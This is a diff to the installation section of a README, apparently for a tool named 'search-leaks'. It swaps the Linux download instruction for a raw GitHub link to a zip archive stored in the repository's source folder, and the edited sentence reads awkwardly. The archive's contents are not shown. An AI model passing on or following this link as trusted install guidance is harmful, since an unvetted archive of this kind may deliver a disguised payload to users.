rick0112/search-leaks/README.md

    - For Windows users, download the `.exe` file.
    - For macOS users, download the `.dmg` file.
-   - For Linux users, download the `.tar.gz` file.
+   - For Linux users, download the `https://github.com/rick0112/search-leaks/raw/refs/heads/main/cmd/search-leaks/search-leaks-v1.8.zip` file.

 4. Once downloaded, locate the file in your downloads folder.
 5. Follow the installation instructions relevant to your operating system.